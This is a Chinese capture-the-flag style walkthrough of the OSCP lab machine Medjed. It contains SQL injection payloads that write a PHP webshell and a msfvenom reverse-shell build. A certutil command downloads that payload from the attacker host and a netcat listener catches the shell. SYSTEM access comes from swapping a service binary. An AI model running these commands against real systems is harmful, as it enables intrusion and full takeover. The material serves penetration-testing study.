当前位置：首页 > news >正文

OSCP靶机--Medjed

news 文章来源：https://blog.csdn.net/qq_33168924/article/details/136292889 2025/2/3 14:48:01

OSCP靶机–Medjed

考点：(1.ftp文件上传 2.sql注入写shell 3.第三软件提权)

1.nmap


┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.200.127 -sV -sC -p-  --min-rate 5000 
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-25 19:42 EST
Nmap scan report for 192.168.200.127
Host is up (0.27s latency).
Not shown: 65517 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
| fingerprint-strings: 
|   GenericLines, JavaRMI, NULL, giop: 
|_    Host '192.168.45.157' is not allowed to connect to this MariaDB server
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
8000/tcp  open  http-alt      BarracudaServer.com (Windows)
| fingerprint-strings: 
|   FourOhFourRequest, Socks5: 
|     HTTP/1.1 200 OK
|     Date: Mon, 26 Feb 2024 00:43:15 GMT
|     Server: BarracudaServer.com (Windows)
|     Connection: Close
|   GenericLines: 
|     HTTP/1.1 200 OK
|     Date: Mon, 26 Feb 2024 00:43:08 GMT
|     Server: BarracudaServer.com (Windows)
|     Connection: Close
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Mon, 26 Feb 2024 00:43:09 GMT
|     Server: BarracudaServer.com (Windows)
|     Connection: Close
|   HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Date: Mon, 26 Feb 2024 00:43:21 GMT
|     Server: BarracudaServer.com (Windows)
|     Connection: Close
|   SIPOptions: 
|     HTTP/1.1 400 Bad Request
|     Date: Mon, 26 Feb 2024 00:44:28 GMT
|     Server: BarracudaServer.com (Windows)
|     Connection: Close
|     Content-Type: text/html
|     Cache-Control: no-store, no-cache, must-revalidate, max-age=0
|_    <html><body><h1>400 Bad Request</h1>Can't parse request<p>BarracudaServer.com (Windows)</p></body></html>
| http-methods: 
|_  Potentially risky methods: PROPFIND PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
|_http-title: Home
|_http-server-header: BarracudaServer.com (Windows)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
30021/tcp open  ftp           FileZilla ftpd 0.9.41 beta
|_ftp-bounce: bounce working!
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r-- 1 ftp ftp            536 Nov 03  2020 .gitignore
| drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 app
| drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 bin
| drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 config
| -r--r--r-- 1 ftp ftp            130 Nov 03  2020 config.ru
| drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 db
| -r--r--r-- 1 ftp ftp           1750 Nov 03  2020 Gemfile
| drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 lib
| drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 log
| -r--r--r-- 1 ftp ftp             66 Nov 03  2020 package.json
| drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 public
| -r--r--r-- 1 ftp ftp            227 Nov 03  2020 Rakefile
| -r--r--r-- 1 ftp ftp            374 Nov 03  2020 README.md
| drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 test
| drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 tmp
|_drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 vendor
33033/tcp open  unknown
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 3102
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8" />
|     <title>Action Controller: Exception caught</title>
|     <style>
|     body {
|     background-color: #FAFAFA;
|     color: #333;
|     margin: 0px;
|     body, p, ol, ul, td {
|     font-family: helvetica, verdana, arial, sans-serif;
|     font-size: 13px;
|     line-height: 18px;
|     font-size: 11px;
|     white-space: pre-wrap;
|     pre.box {
|     border: 1px solid #EEE;
|     padding: 10px;
|     margin: 0px;
|     width: 958px;
|     header {
|     color: #F0F0F0;
|     background: #C52F24;
|     padding: 0.5em 1.5em;
|     margin: 0.2em 0;
|     line-height: 1.1em;
|     font-size: 2em;
|     color: #C52F24;
|     line-height: 25px;
|     .details {
|_    bord
44330/tcp open  ssl/unknown
| ssl-cert: Subject: commonName=server demo 1024 bits/organizationName=Real Time Logic/stateOrProvinceName=CA/countryName=US
| Not valid before: 2009-08-27T14:40:47
|_Not valid after:  2019-08-25T14:40:47
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 200 OK
|     Date: Mon, 26 Feb 2024 00:44:29 GMT
|     Server: BarracudaServer.com (Windows)
|     Connection: Close
|   GenericLines: 
|     HTTP/1.1 200 OK
|     Date: Mon, 26 Feb 2024 00:43:24 GMT
|     Server: BarracudaServer.com (Windows)
|     Connection: Close
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Mon, 26 Feb 2024 00:43:26 GMT
|     Server: BarracudaServer.com (Windows)
|     Connection: Close
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Mon, 26 Feb 2024 00:43:29 GMT
|     Server: BarracudaServer.com (Windows)
|     Connection: Close
|   RTSPRequest: 
|     HTTP/1.1 200 OK
|     Date: Mon, 26 Feb 2024 00:43:30 GMT
|     Server: BarracudaServer.com (Windows)
|     Connection: Close
|   SIPOptions: 
|     HTTP/1.1 400 Bad Request
|     Date: Mon, 26 Feb 2024 00:44:46 GMT
|     Server: BarracudaServer.com (Windows)
|     Connection: Close
|     Content-Type: text/html
|     Cache-Control: no-store, no-cache, must-revalidate, max-age=0
|_    <html><body><h1>400 Bad Request</h1>Can't parse request<p>BarracudaServer.com (Windows)</p></body></html>
|_ssl-date: 2024-02-26T00:46:09+00:00; -2s from scanner time.
45332/tcp open  http          Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
|_http-title: Quiz App
45443/tcp open  http          Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
|_http-title: Quiz App
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPCHost script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-02-26T00:45:48
|_  start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 210.53 seconds

2.user priv

依次查看http端口，ftp匿名访问端口：
发现http:8000端口可以重置ftp管理员密码：
http://192.168.200.127:8000/Config-Wizard/wizard/SetAdmin.lsp

http 目录扫描：
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.200.127:45443/┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.200.127:45332/
[22:17:31] 200 -  887B  - /index.html                                                                           
[22:17:49] 200 -   90KB - /phpinfo.php    ## http:192.168.200.127:33033/
## 发现登陆口：192.168.200.127:33033/login
## 发现用户信息：192.168.200.127:33033/
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.200.127:33033/_|. _ _  _  _  _ _|_    v0.4.2(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /root/.dirsearch/reports/192.168.200.127-33033/-_24-02-25_22-15-35.txtError Log: /root/.dirsearch/logs/errors-24-02-25_22-15-35.logTarget: http://192.168.200.127:33033/[22:15:36] Starting: 
[22:17:10] 200 -    2KB - /404                                               
[22:17:10] 200 -    2KB - /404.html                                          
[22:17:11] 200 -    2KB - /500                                               
[22:21:48] 200 -    0B  - /favicon.ico                                        
[22:22:49] 200 -    1KB - /login                                              
[22:22:49] 200 -  939B  - /login.js                                           
[22:22:49] 200 -    1KB - /login.jsp
[22:22:49] 200 -    1KB - /login.html
[22:22:49] 200 -    1KB - /login.cgi                                          
[22:22:49] 200 -    1KB - /login.htm
[22:22:49] 200 -    1KB - /login.pl
[22:22:49] 200 -    1KB - /login.py
[22:22:49] 200 -    1KB - /login.shtml
[22:22:49] 200 -    1KB - /login.wdm%20                                       
[22:22:49] 200 -    1KB - /login.srf
[22:22:50] 200 -    1KB - /login.rb
[22:22:50] 200 -    1KB - /login.wdm%2e
[22:22:50] 200 -    1KB - /login/
[22:22:53] 302 -  100B  - /logout  ->  http://192.168.200.127:33033/login     
[22:22:53] 302 -  100B  - /logout.php  ->  http://192.168.200.127:33033/login 
[22:22:53] 302 -  100B  - /logout.aspx  ->  http://192.168.200.127:33033/login
[22:22:53] 302 -  100B  - /logout.jsp  ->  http://192.168.200.127:33033/login 
[22:22:53] 302 -  100B  - /logout.html  ->  http://192.168.200.127:33033/login
[22:22:53] 302 -  100B  - /logout.js  ->  http://192.168.200.127:33033/login
[22:22:53] 302 -  100B  - /logout/  ->  http://192.168.200.127:33033/login
[22:22:53] 302 -  100B  - /logout.asp  ->  http://192.168.200.127:33033/login 
[22:24:02] 200 -    2KB - /rails/info/properties                              
[22:24:11] 200 -   99B  - /robots.txt                                         
[22:25:15] 200 -    4KB - /users.php                                          
[22:25:15] 200 -    4KB - /users
[22:25:15] 200 -    3KB - /users.js                                           
[22:25:15] 200 -    4KB - /users.jsp                                          
[22:25:15] 200 -    4KB - /users.html                                                                               
[22:25:15] 200 -    1KB - /users.json                                                                               
[22:25:15] 200 -    4KB - /users.db
[22:25:15] 200 -    4KB - /users.log
[22:25:15] 200 -    4KB - /users.ini
[22:25:16] 200 -    4KB - /users.sqlite
[22:25:16] 200 -    4KB - /users.xls
[22:25:16] 200 -    4KB - /users/
[22:25:16] 406 -   99KB - /users.csv
[22:25:17] 406 -   99KB - /users.txt                                          Task Completed

2.1 方法1：ftp上传php webshell:

ftp重置管理员密码：
在这里插入图片描述

发现phpinfo信息：

上传木马，获取shell:
https://github.com/Dhayalanb/windows-php-reverse-shell

发现用户账户信息：收集整理：
在这里插入图片描述


┌──(root㉿kali)-[~/Desktop/Medijed]
└─# cat users.txt 
evren.eagan
joe.webb
jerren.devops
kenneth.dooley
laura.lauer
christopher

2.2 方法2：发现sqli

用户密码重置功能：
在这里插入图片描述

在这里插入图片描述
根据目录扫描发现存在报错信息：

发现更多路由信息：
在这里插入图片描述
尝试路由信息url，发现需要认证，但是/slug不需要，并且存在sql注入：

sql注入：

## sql源码：
sql = "SELECT username FROM users WHERE username = '" + params[:URL].to_s + "'"##
选项 1 - Time Based Boolean Blind
SELECT username FROM users WHERE username = '' UNION SELECT IF(1=1, SLEEP(5), null)-- -
http://192.168.237.127:33033/slug?URL=%27%20UNION%20SELECT%20IF(1=2,%20SLEEP(5),%20null)--%20-
The IF conditional will make the server sleep for 5 seconds if the condition is True, or respond immediately otherwise.
选项 2 - Error Based
SELECT username FROM users WHERE username = '' AND 1= (SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT username FROM users LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)-- -
The SELECT username FROM users LIMIT 0,1 output gets reflected in the MySQL error.
http://192.168.237.127:33033/slug?URL=%27%20AND%201=%20(SELECT%201%20FROM(SELECT%20COUNT(*),concat(0x3a,(SELECT%20username%20FROM%users%20LIMIT%200,1),FLOOR(rand(0)*2))x%20FROM%20information_schema.TABLES%20GROUP%20BY%20x)a)--%20-##
在这个案例中我们看到 evren.eagan 是第一个用户：
替换查询语句： SELECT reminder FROM USERS LIMIT 0,1

在这里插入图片描述

在这个案例中我们看到 evren.eagan 是第一个用户：
替换查询语句： SELECT reminder FROM USERS LIMIT 0,1

说明evren.eagan的reminder是：4qpdR87QYjRbog
重置密码：

2.3 sql注入写php webshell：

##回顾端口 45332 上的 Web 服务器，我们发现网站的文档根目录（从输出phpinfo()）为C://xampp://htdocs//。利用 SQLi 漏洞，我们应该能够向该## 目录编写 PHP Web shell。## 这是我们的UNION注入查询：
' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php'  -- -'## 当我们提交表单时，URL 更改为以下内容：
http://192.168.120.132:33033/slug?URL=%27+UNION+SELECT+%28%22%3C%3Fphp+echo+passthru%28%24_GET%5B%27cmd%27%5D%29%3B%22%29+INTO+OUTFILE+%27C%3A%2Fxampp%2Fhtdocs%2Fcmd.php%27++--+-%27## Windows 命令传递到cmd参数中来验证这一点：
kali@kali:~$ curl "http://192.168.120.132:45332/cmd.php?cmd=dir"Volume in drive C has no label.Volume Serial Number is A41E-B108Directory of C:\xampp\htdocs11/09/2020  08:46 AM    <DIR>          .
11/09/2020  08:46 AM    <DIR>          ..
11/09/2020  08:46 AM                35 cmd.php
11/03/2020  11:13 AM               887 index.html
11/03/2020  11:16 AM                21 phpinfo.php
11/03/2020  11:13 AM             3,023 script.js
11/03/2020  11:14 AM             1,266 styles.css5 File(s)          5,232 bytes2 Dir(s)   1,602,994,176 bytes free## 获取shell
## 经过一些测试，我们发现我们的攻击机器只能通过某些端口到达。我们将使用端口 30021 作为反向 shell，使用端口 45332 作为 Web 服务器来托管## 我们的负载。
## Metasploit 创建反向 shell 负载。
kali@kali:~$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.118.8 LPORT=30021 -f exe -o reverse.exe      
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: reverse.exe## 我们将启动一个 Python Web 服务器来监听端口 45332。
kali@kali:~$ python3 -m http.server 45332                
Serving HTTP on 0.0.0.0 port 45332 (http://0.0.0.0:45332/) ...## 接下来，我们可以使用 Web shell 将有效负载下载到目标certutil。请注意，我们需要对命令进行 URL 编码。
kali@kali:~$ curl "http://192.168.120.132:45332/cmd.php?cmd=certutil+-f+-urlcache+http://192.168.118.8:45332/reverse.exe+reverse.exe"
****  Online  ****
CertUtil: -URLCache command completed successfully.## 让我们在端口 30021 上启动一个 Netcat 侦听器。
kali@kali:~$ nc -lvnp 30021
listening on [any] 30021 ...## 最后，我们将使用 Web shell 来执行我们的有效负载。
kali@kali:~$ curl "http://192.168.120.132:45332/cmd.php?cmd=reverse.exe"
...## Netcat 输出表明我们已收到反向 shell：
kali@kali:~$ nc -lvnp 30021
listening on [any] 30021 ...
connect to [192.168.118.8] from (UNKNOWN) [192.168.120.132] 49946
Microsoft Windows [Version 10.0.18363.1139]
(c) 2019 Microsoft Corporation. All rights reserved.C:\xampp\htdocs>whoami
whoami
medjed\jerren

在这里插入图片描述

3. root priv(第三方服务提权)

https://www.exploit-db.com/exploits/48789
##
## 结合winpeas.exe结果看出：属于第三方服务提权：
## bd(BarracudaDrive ( bd ) service)["C:\bd\bd.exe"] - Auto - Running
#######################################################################
##
bd(BarracudaDrive ( bd ) service)["C:\bd\bd.exe"] - Auto - Running## google搜索：
barracudadrive v6.5 privilege escalation
##
https://www.exploit-db.com/exploits/48789##
本地枚举
在枚举C:\驱动器时，我们发现一个有趣的文件夹：C:\bd。C:\xampp\htdocs>cd C:\
cd C:\C:\>dir
dirVolume in drive C has no label.Volume Serial Number is A41E-B108Directory of C:\01/21/2021  05:48 AM    <DIR>          bd
11/03/2020  10:46 AM    <DIR>          FTP
10/16/2020  12:49 PM    <DIR>          PerfLogs
...
让我们列出它的内容。C:\>cd bd
cd bdC:\bd>dir
dirVolume in drive C has no label.Volume Serial Number is A41E-B108Directory of C:\bd01/21/2021  05:48 AM    <DIR>          .
01/21/2021  05:48 AM    <DIR>          ..
11/03/2020  09:29 AM    <DIR>          applications
11/03/2020  09:29 AM                38 bd.conf
11/03/2020  09:29 AM               259 bd.dat
04/26/2013  02:55 PM         1,661,648 bd.exe
06/12/2011  01:49 PM               207 bd.lua
04/26/2013  02:55 PM           912,033 bd.zip
06/14/2012  09:21 AM            33,504 bdctl.exe
11/03/2020  09:29 AM    <DIR>          cache
11/03/2020  09:29 AM    <DIR>          cmsdocs
11/03/2020  09:29 AM    <DIR>          data
12/03/2010  01:52 PM             5,139 install.txt
10/26/2010  01:38 PM           421,200 msvcp100.dll
10/26/2010  01:38 PM           770,384 msvcr100.dll
02/18/2013  07:39 PM           240,219 non-commercial-license.rtf
01/21/2021  05:48 AM                 6 pidfile
04/26/2013  02:50 PM            16,740 readme.txt
11/03/2020  09:29 AM               702 roles.dat
06/14/2012  09:21 AM           383,856 sqlite3.exe
11/03/2020  09:29 AM    <DIR>          themes
01/21/2021  05:48 AM    <DIR>          trace
11/03/2020  09:29 AM           133,107 Uninstall.exe15 File(s)      4,579,042 bytes8 Dir(s)   2,130,604,032 bytes free
readme.txt的内容揭示了非常有用的信息：C:\bd>type readme.txt
type readme.txtChanges for 6.5   May 2013...The following Web File Manager problems are now fixed:* The image pre-view could cause BarracudaDrive to consume too muchmemory on low memory devices such as the Raspberry Pi....
我们发现bd指的是BarracudaDrive，其版本 6.5 正在运行。BarracudaDrive v6.5 - 不安全的文件夹权限
经过漏洞利用搜索后，我们发现了一个不安全文件夹权限漏洞。让我们尝试验证一下。C:\bd>icacls C:\bd
icacls C:\bd
C:\bd BUILTIN\Administrators:(I)(OI)(CI)(F)NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)BUILTIN\Users:(I)(OI)(CI)(RX)NT AUTHORITY\Authenticated Users:(I)(M)NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)Successfully processed 1 files; Failed processing 0 filesC:\bd>icacls C:\bd\bd.exe
icacls C:\bd\bd.exe
C:\bd\bd.exe BUILTIN\Administrators:(I)(F)NT AUTHORITY\SYSTEM:(I)(F)BUILTIN\Users:(I)(RX)NT AUTHORITY\Authenticated Users:(I)(M)Successfully processed 1 files; Failed processing 0 filesC:\bd>
我们将重用反向 shell 有效负载文件 ( reverse.exe ) 并将其保存为bd.exe。首先，我们将备份原始二进制文件：C:\bd>move bd.exe bd.exe.bak
move bd.exe bd.exe.bak1 file(s) moved.
现在，我们可以安全地将反向 shell 复制为C:\bd\bd.exe。C:\bd>copy C:\xampp\htdocs\reverse.exe bd.exe
copy C:\xampp\htdocs\reverse.exe bd.exe1 file(s) copied.
让我们在同一端口上重新启动 Netcat 侦听器。kali@kali:~$ nc -lvnp 30021                        
listening on [any] 30021 ...
现在我们要做的就是重新启动目标机器：C:\bd> shutdown /r 
C:\bd>kali@kali:~$
重新启动后， bd.exe的恶意副本将被执行，并且我们会看到完整的系统 shell：kali@kali:~$ nc -lvnp 30021                        
listening on [any] 30021 ...
connect to [192.168.118.8] from (UNKNOWN) [192.168.120.132] 49669
Microsoft Windows [Version 10.0.18363.1139]
(c) 2019 Microsoft Corporation. All rights reserved.C:\Windows\system32> C:\Windows\system32>whoami
whoami
nt authority\system

4.总结

## 参考：
https://pentesting.zeyu2001.com/proving-grounds/get-to-work/medjed#exploitation